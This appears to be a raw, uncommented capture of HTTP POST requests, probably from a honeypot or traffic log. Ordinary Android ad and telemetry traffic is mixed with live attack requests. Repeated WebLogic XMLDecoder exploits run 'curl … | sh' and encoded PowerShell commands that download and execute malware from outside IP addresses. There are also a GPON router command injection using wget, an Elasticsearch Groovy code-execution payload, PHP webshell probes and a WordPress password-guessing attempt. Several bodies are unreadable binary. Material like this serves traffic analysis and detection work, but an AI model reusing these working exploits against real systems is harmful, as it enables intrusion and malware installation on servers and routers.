User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: android.bugly.qq.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004

4"ıv⁄Q∞ø©∞cï≠äÌ¡O9}Ç›äyü;-â#p}XµUôPrû5F˘”“—JŸ:"%GíO∏8◊_a¨UÌk QŒ8Rπû%l‡‘¶à˘¿˙'?¶…$’äZf]9òiV¶NLjÕÈØ|ÎȬ≥è/´âé>,∏¬
8ô∆≤¡
T*¥d&Ôı&≠yn⁄쑨˙P»çÜ=xÆ#ñù†tû¥¨ï4wóùBYaF]‡Ç<,su'pfi7ÆÕ ∏Ò"OB™+ÔcÖë—Œo
‡ +Æ—<Oû|¨YÛT∆ˆ™Øï2A¢&é∏ˆlnAfl¨›∞D≤+ä˙ËÚWH#Ç}ò;–˜…äk˙ÁÇ28
˜∞ÅJ›ö•†©˝Éîó‡ù/p!
^W0˚M ≈=º∆H+Æ®0÷HPhcªπ5&2”Ä#[.ou-•5wS·GB⁄	™œ=Ä&Wõ –?åW⁄†‚‚¨‚qºƒöBƒ/ÛÚ&ÅÕÉ¡∆£flmˆ?ªRd›πV¿G;ï•mΩçD¥SÏDÑs‚ˇ´˚yb’2˘z+™•c*A÷CT ¿4”zi…"”§÷+¥@∫çxÈiüõΩπNNûˆÄ≥fÏW•1KØ™«Á–ä´QòïÈ…aπ~≥á5˝V_¬¶U=‚Êá«SAz|*æÿ‡Õ)Åfl¢¡K§;_22º7«~lï]9Hº⁄èEr·Ák¶î?7EˆÔ`Ya∫/Ä÷πrY∞w¿‘5Êñyn
Ô Zµ˜b {w[û…∑HΩı^{Ö*BãW1Œ>«®1“™√ï}|ÛT\?Bƒ@4°≤7ÏÏÇÑÒ¡ØÙ>êTûóÙµv€èÑ•Muıvaì´"‰0PUx¡$ú(zÓ`ò*)≠»¨‘ˇ^|Jæì9≠ä§2œ¿N=-•ëfi\F+Oõ~€L√Œ—C‰|¯1∫!oöµÉ¯Û%fiqcB!q9ë+≈ÒâTU|π_T⁄ökœÑuØÇC"N8QIØŒ ˙RÕI4XÏöÊߣf
Ûnh}G∞Ç≥˚>ÖŒ£◊r{¡ë≈[Nûi"Ô˜&õg˙∞©óW?Á±„úT!ôCÊÇ∞nùÈ7Z1Çc—V»-Dä&xsk.πù#}Ä—˜puîOUì±ßX◊Ï!ÖÌÅfl¡0#Ì>ó”üd∞v>{vWöœ)ä
§»
9c¡Fπ*€iê
ÿy§Îî¿Å‰}…Î$¸ı?6É8»åù∫"꓆’ñæµÒ3”°86;+≥i∞¥ï,F`◊_◊É
Q1&ÕR6˝/Òxœ{å'

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /404 HTTP/1.1
User-Agent: apache
Host: x.x.x.x
Content-Length: 4
Connection: Keep-Alive
Cache-Control: no-cache

test

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://p-behacdn.ksmobile.net/cu HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 666

ö%\
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcékV∏iRËc^<∞êΩúrjå¥ÚkZ&=%Ocøúèï@hÃ(8k£I)0OzBo‚ØDhA*8kZ&=0OoAvpffG*:k[&=0koBcsBd*0kX&<0Oo]tQkA}C&H±R&?0NoBc#∫Ph@?8g(¸50MoBcpjBhC*;~Z*HÍGo@cpjBhC*8kY3=<7µJcrjBhC*8kZ&>%Oc>πxj@hC*8kZ&=0LzBo‹BhA*bkZ&~;pmAvpfÜCF*:kc&=0˜∂;csBd€˚8kX&V0Oo*Ò&aA}C&√]&?0OoBcpjBh@?8g”;0MoEcpj’OE*;~Z*éFo@cxjBhe”PY3=<"‚BcrjKhC*ÀEı&>%Oc!wj@hfl*8k
Ä„0LzBo(EhA*<kZ&≈KlAvpf◊8K*:kZ&=0OoBcsBd8}0kX&f0OoánjA}C&R&?0OoBcpjBh@?8g2¶50MoBcpjBhC*;~Z*¬êHo@cpjBhC*8kY3=<YJcrjBhC*8kZ&>%Oc[ûxj@h@*8kfi°90LzBoàıEhA*9kZ&R}NoAvpfY E*:k[&=0Í^KcsBd˘˜:kX&=0OoBcpjA}C&A¸_&?0OoBcpjBh@?8gÒ‡<0Mo7cpj[«6(;~Z*Jo@cpjBhC*8kY3=<ƒJcrjChC*ßkZ&>%Ocºúèï@hçˆâRx&=0OzB

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=44444444

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 318

{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","networkOperator":"TELKOMSEL","volume":0.4,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST http://behacdn.ksmobile.net/adsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 222

fi‡qô
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjIN>j√4§…!3 §∏Ê(`˚é;S†è‰	≤@≈OøJE‰ÙØI∫üKqéUÀ·ö"÷(∆|ÊVj}>™6ˇ‚VeU∑oØ˙1TvÚ©Rttı4Ωrœ3…Æ#óâØ≤A”ÃöÉW‰qbê;ªùºfia¿¿\
◊…òn–œj∞I”Rú‰`<XFŸÙπ≥Ó(SLÁ›ô ∆ê]qF∂Í≠Ì(൫2J©æàu¿õ

POST http://md5decryption.com/index.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Host: md5decryption.com
Referer: http://md5decryption.com/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Proxy-Connection: Keep-Alive
Content-Length: 56

hash=ba5e55274f87dc3ca333de8ebb8f0c4c&submit=Decrypt It!

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970

{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":179,"SubmitData_time":467814,"FetchNextAd_time":2814183,"RepeatSubmitData_time":359402,"RenderAd_time":1347613,"TaskDispatchPostback_time":367125,"ad_session_start":1496194010033,"FetchNextAd_count":177,"RepeatFetchNextAd_time":585708,"cached_files_expired":66,"RepeatFetchNextAd_count":23,"RepeatSubmitData_count":19,"TaskDispatchPostback_count":38,"TaskCollectAdvertisingId_time":20602,"RenderAd_count":64,"SubmitData_count":34,"TaskCollectAdvertisingId_count":38}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149463223761&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1
Referer: http://x.x.x.x:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x:8080
Content-Length: 0
Cache-Control: no-cache



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache

EPdbkNjNY5qYx78inpLijz+we9kA9LEhIYcoL2MjvsAHtN4MIF0uMpuIw0OHvInPOcpSxj1fdFcNViYkdTyHrTI96CqXaE6M+Nm48RJbWTLU2dv/+cfs2YLh63706esDHS8gaYM5/j2RX+V+yuiOMkx4031GPdP7zd6Cu4NW49DkwPrzl2vtYglp4aOFk5o6KmeG78myspweEienXpG2Oe2vhhCAo0S/8nz3QpnFe8CpQDrux+w2nanpzqbxXNcPvZm9pl9BsOkh+ma0AYcUk0wkJsXI+hm4beHc+Sxw+5SjR1K7skH6WdOst4g+yl03ij+UznQUL6isMTcWLk4l0YAYHu7Y54LkSIB9WUJC/EWVDr4Hg3NhTgMiO0zko5riQHe6h8/BDXwnF9wk223DblWOBrg=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˙PbÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
GˇuÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î·/Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1495891946309
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 1297



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache

S6wMk9vKMLQI5f/H+NH7pbyryS5Oe9TJlmyFRrHEPzqa1R3Ko3IgwqBAlgCqDXOm9056gOGJiTgORlF4tOa1cGCcs06OE4sha2RvqLlDkolA2bLw1WAtr2wl7X3wRXidlakJGZ7pJmm9cJfKzB71jOJ61a3G3Eq38ttXGaXfbPH9+Xkh0jShws0VEXzPAH5b40QVzADD5DCa181lRp063Si/X+/9Q0jtpsCBwBBgx1DWXWKqC3PC3u7yoshRnuv8zgrr+qPIrOQx3GJ7od/zzO6gP5/3LpHvqmRkjH31ypIWle3QgJ7J0GHuFuYJKZ9l/Tn1YG1ukV4n5ZneAUgd3zX3uCuGj515/eUv9/ZUKYiNQ7IDk6cd4JAUNvfTBANHTgo0tYz65PKijV39+sr9tYCpzg==

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
